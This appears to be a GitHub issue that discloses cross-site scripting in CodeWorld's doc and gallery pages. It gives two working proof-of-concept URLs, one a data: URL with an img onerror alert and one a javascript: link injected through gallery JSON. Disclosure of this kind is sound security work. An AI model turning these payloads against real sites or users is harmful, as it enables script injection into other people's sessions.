You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Im not sure whats considered a risk maybe this is allowed also the security policy for this repo is https://github.com/google/codeworld/security/policy and google probably wont respond to reported issues.
It seems normally code is run in a sandboxed iframe #1193 but you can still get XSS via a link.
https://code.world/doc.html?path=data:text/html,%3Cimg%20src%20onerror=%22alert(window.origin)%22%3E%3C/img%3E
https://code.world/gallery.html?path=data:text/html,%7B%22items%22:%5B%7B%22name%22:%22Click%20me%22,%22url%22:%22javascript:alert(window.origin)%22%7D%5D%7D (Needs click but no embed protection)
Im not sure whats considered a risk maybe this is allowed also the security policy for this repo is https://github.com/google/codeworld/security/policy and google probably wont respond to reported issues.